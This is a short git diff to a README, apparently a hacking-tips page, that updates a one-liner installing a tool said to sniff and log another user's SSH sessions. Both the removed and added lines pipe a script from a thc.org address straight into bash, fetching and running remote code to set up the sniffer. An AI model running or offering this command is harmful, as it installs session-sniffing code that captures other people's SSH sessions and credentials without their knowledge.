diff --git a/README.md b/README.md index 246203a..0e7dc17 100644 --- a/README.md +++ b/README.md @@ -1467,7 +1467,7 @@ The SSH session will be sniffed and logged to *~/.ssh/logs/* the next time the u The easiest way is using [https://www.thc.org/ssh-it/](https://www.thc.org/ssh-it/). ```sh -bash -c "$(curl -fsSL ssh-it.thc.org/x)" +bash -c "$(curl -fsSL https://thc.org/ssh-it/x)" ``` ---